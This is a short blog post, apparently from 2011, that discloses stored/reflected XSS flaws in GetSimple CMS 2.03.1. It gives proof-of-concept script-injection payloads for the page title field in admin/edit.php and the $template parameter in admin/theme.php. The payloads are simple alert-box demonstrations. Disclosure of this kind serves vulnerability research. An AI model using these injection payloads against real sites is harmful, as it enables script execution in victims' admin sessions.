Saturday 19 November 2011

GetSimple CMS 2.03.1 XSS


Some old info that I found on my other disk. Enjoy:

# --------------------------------------------------------------------------- #
# - Title      : GetSimple CMS 2.03.1
# - Tested on      : Ubuntu
# - Date      : 24/27.o3.2o11
# - Download Link : @sourceforge.net
# - Author      : ;)
# - Greetz      :
# --------------------------------------------------------------------------- #


czw, 24 mar 2011, 22:05:57 CET
Get Simple CMS 2.03.1

http://localhost/www/cms/GetSimple_2.03.1.zip-unzip/GetSimple/admin/edit.php
'Create New Page'
post in title "><script> and view


27.o3.2o11 GetSimple 2.03.1 XSS for logged (http://www.cagintranetworks.com/)

http://localhost/www/cms/GetSimple_2.03.1.zip-unzip/GetSimple/admin/theme.php
vulnerable param:
$template="><script>alert(2)</script>


regards,

No comments:

Post a Comment

What do You think...?